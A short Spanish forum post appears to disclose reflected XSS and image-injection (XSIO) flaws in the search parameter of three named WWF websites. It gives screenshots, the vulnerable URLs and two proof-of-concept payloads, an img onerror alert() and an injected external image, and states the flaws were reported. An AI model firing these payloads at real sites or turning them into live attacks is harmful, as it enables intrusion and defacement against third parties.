Vulnerabilidades XSS y XSIO para varios dominios de WWF:
XSS
(http://i48.tinypic.com/119ph8m.png)
(http://i46.tinypic.com/2wce0ro.png)
(http://i50.tinypic.com/2v3izgm.png)
Urls:
- http://wwf.panda.org/index.cfm?uGlobalSearch=
- http://www.wwf.es/index.cfm?uGlobalSearch=
- http://www.wwfca.org/index.cfm?uGlobalSearch=
Vector: "><img src=x onerror=alert(/Hu0r/);>
Autor: Hu0r
Reportado: Si
XSIO
(http://i48.tinypic.com/2ug1nyx.png)
(http://i49.tinypic.com/mjwpe0.png)
(http://i47.tinypic.com/53wsqw.png)
Urls:
- http://wwf.panda.org/index.cfm?uGlobalSearch=
- http://www.wwf.es/index.cfm?uGlobalSearch=
- http://www.wwfca.org/index.cfm?uGlobalSearch=
Vector: "><img src='http://underc0de.org/foro/Themes/underc0de/images/theme/logo.png' style='position:absolute;left:500px;top:150px;'/>
Autor: Hu0r
Reportado: Si
Saludos!